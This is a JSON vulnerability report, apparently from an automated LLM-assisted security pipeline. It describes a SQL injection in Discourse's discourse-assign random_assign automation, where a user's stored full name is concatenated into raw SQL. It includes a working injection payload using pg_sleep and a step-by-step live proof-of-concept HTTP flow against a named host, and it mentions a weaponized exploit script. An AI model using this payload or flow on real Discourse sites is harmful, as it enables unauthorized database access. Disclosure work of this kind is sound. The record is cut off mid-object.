{
  "track": "A",
  "vuln_class": "sql-injection",
  "cwe": "CWE-89",
  "title": "Random assign automation interpolates stored assignee names into SQL",
  "severity_estimate": "high",
  "correlation_id": "discourse-assign-random-assign-name-sqli",
  "source": {
    "file": "targets/discourse/app/models/user.rb",
    "line": 157,
    "symbol": "User#name",
    "description": "A user's full name is user-controlled and is only length-validated to 255 characters; the custom user_full_name validator does not restrict SQL metacharacters."
  },
  "sink": {
    "file": "targets/discourse/plugins/discourse-assign/lib/random_assign_utils.rb",
    "line": 55,
    "symbol": "RandomAssignUtils#recently_assigned_users_ids",
    "description": "Stored action_code_who values are joined into a PostgreSQL array literal inside a raw joins() SQL fragment."
  },
  "flow": [
    {
      "file": "targets/discourse/app/models/user.rb",
      "line": 157,
      "note": "User#name is allowed up to 255 characters; no quote, brace, comma, or SQL delimiter escaping is enforced."
    },
    {
      "file": "targets/discourse/lib/validators/user_full_name_validator.rb",
      "line": 4,
      "note": "The full-name validator only enforces presence when full names are required at signup."
    },
    {
      "file": "targets/discourse/plugins/discourse-assign/lib/assigner.rb",
      "line": 495,
      "note": "When SiteSetting.prioritize_full_name_in_ux is enabled, assigning a user stores assign_to.name in the small-action post custom field action_code_who."
    },
    {
      "file": "targets/discourse/plugins/discourse-assign/lib/assigner.rb",
      "line": 515,
      "note": "topic.add_moderator_post persists the custom field alongside action codes such as assigned, reassigned, or assigned_to_post."
    },
    {
      "file": "targets/discourse/plugins/discourse-assign/lib/random_assign_utils.rb",
      "line": 37,
      "note": "The random_assign automation later reads prior assignment display values from PostCustomField where name is action_code_who."
    },
    {
      "file": "targets/discourse/plugins/discourse-assign/lib/random_assign_utils.rb",
      "line": 55,
      "note": "The values are concatenated with usernames.join(',') and embedded into JOIN unnest('{...}'::text[]) without SQL quoting or array-literal escaping."
    }
  ],
  "sanitizers_seen": [
    "User#name has a 255-character maximum length but no metacharacter allowlist or SQL escaping.",
    "User.where(username: usernames) is parameterized, but the unsafe joins() string is parsed as SQL before that bind-filter can constrain anything.",
    "The safe branch stores username when prioritize_full_name_in_ux is false; usernames are format-validated, but the full-name branch is not."
  ],
  "evidence": "The random_assign automation builds a raw join string: JOIN unnest('{#{usernames.join(',')}}'::text[]) WITH ORDINALITY t(username, ord) USING(username). The usernames array is actually prior PostCustomField action_code_who values. In the assignment plugin, action_code_who is set to assign_to.name when prioritize_full_name_in_ux is enabled, and User#name is only length/presence validated. A stored full name such as `x}'::text[]) WITH ORDINALITY t(username, ord) ON true JOIN LATERAL pg_sleep(5) s ON true --` produces the SQL fragment `JOIN unnest('{x}'::text[]) WITH ORDINALITY t(username, ord) ON true JOIN LATERAL pg_sleep(5) s ON true --}'::text[]) WITH ORDINALITY t(username, ord) USING(username)`, demonstrating that the string literal can be closed and attacker SQL injected. This is conditional on discourse-assign plus DiscourseAutomation random_assign being used and prioritize_full_name_in_ux being enabled, so it was not live-reproduced on the provided target.",
  "detector": "llm-track-a",
  "status": "confirmed",
  "id": "a3063a05b55c9a8f",
  "created_at": "2026-06-06T01:45:12.390949+00:00",
  "updated_at": "2026-06-06T02:40:47.143180+00:00",
  "history": [
    {
      "stage": "track-a",
      "action": "authored by LLM",
      "ts": "2026-06-06T01:45:12.390959+00:00"
    },
    {
      "stage": "track-a",
      "action": "convergence: cross-validation had no correlated hit; live repro blocked because discourse-assign/random assign is disabled or unconfigured",
      "ts": "2026-06-06T01:47:22.155172+00:00"
    },
    {
      "stage": "reproduction",
      "action": "live PoC confirmed: enabled assign_enabled+discourse_automation_enabled+prioritize_full_name_in_ux on http://wsl.evm.pics:31655, attacker (testuser, id=2, non-admin) self-set name via PUT /u/testuser.json to SQLi payload, admin assigned testuser to a topic, RandomAssignUtils#recently_assigned_users_ids executed pg_sleep(3) inside JOIN LATERAL (measured 3.01s wall clock) and returned all-user rowset due to LIMIT/ORDER being commented out",
      "ts": "2026-06-06T02:18:32.102859+00:00"
    },
    {
      "stage": "track-a",
      "action": "convergence: normalized non-schema confirmed_live to confirmed; added public disclosure search result, HTTP-only reproduction evidence, and requests-based PoC script",
      "ts": "2026-06-06T02:27:17.535848+00:00"
    },
    {
      "stage": "track-a",
      "action": "convergence: replaced unstable fresh-topic PoC with stable HTTP PoC targeting confirmed seeded topic_id=35 and retested timing proof",
      "ts": "2026-06-06T02:29:56.695719+00:00"
    },
    {
      "stage": "track-a",
      "action": "agent-d exploitation: added weaponized exploit.py, verified seeded pg_sleep execution, recorded conditional timing/depth constraints",
      "ts": "2026-06-06T02:40:47.143182+00:00"
    }
  ],
  "repro": {
    "attempted": true,
    "success": true,
    "env": "live target http://wsl.evm.pics:31655",
    "poc": "# Stable confirmed live PoC; uses workspace/_accounts.json by default and targets the seeded confirmed topic_id=35.\npython3 workspace/report/a3063a05b55c9a8f/poc.py http://wsl.evm.pics:31655\n\n# Equivalent HTTP flow performed by the PoC:\n# 1) GET /session/csrf and POST /session as admin user1, preserving cookies.\n# 2) POST /admin/plugins/automation/automations.json with automation[script]=random_assign, automation[trigger]=recurring.\n# 3) PUT /admin/plugins/automation/automations/<id>.json with assignees_group=3 and assigned_topic=35, recurrence={interval:1,frequency:day}, start_date=<now-1m>, enabled=true.\n# 4) POST /automations/<id>/trigger.json.\n# 5) Poll GET /admin/plugins/automation/automations.json until stats.last_day.max_run_time >= 3 and total_errors=0.\n# 6) DELETE /admin/plugins/automation/automations/<id>.json to clean up the temporary automation.",
    "observation": "Live HTTP-only reproduction succeeded. The low-privileged testuser account set a malicious full name through PUT /u/testuser.json. Admin then assigned that user to a fresh topic so discourse-assign stored the payload in action_code_who. A temporary random_assign automation targeting that topic was triggered through the admin automation API. The automation stats recorded a successful run with a multi-second runtime attributable to the injected pg_sleep(3) in RandomAssignUtils#recently_assigned_users_ids.",
    "response": "Confirmed live setup request chain: low-privileged testuser set the malicious full name; admin assigned testuser to topic_id=35 while prioritize_full_name_in_ux was enabled, seeding action_code_who with the payload. Stable retest: created temporary random_assign automation id=5 targeting assigned_topic=35; POST /automations/5/trigger.json returned HTTP 200; polling /admin/plugins/automation/automations.json returned stats.last_day={\"total_runs\":1,\"total_time\":6.28094776099897,\"total_errors\":0,\"average_run_time\":6.28094776099897,\"min_run_time\":6.28094776099897,\"max_run_time\":6.28094776099897}. The no-error runtime above 3 seconds is the decisive pg_sleep timing signal.",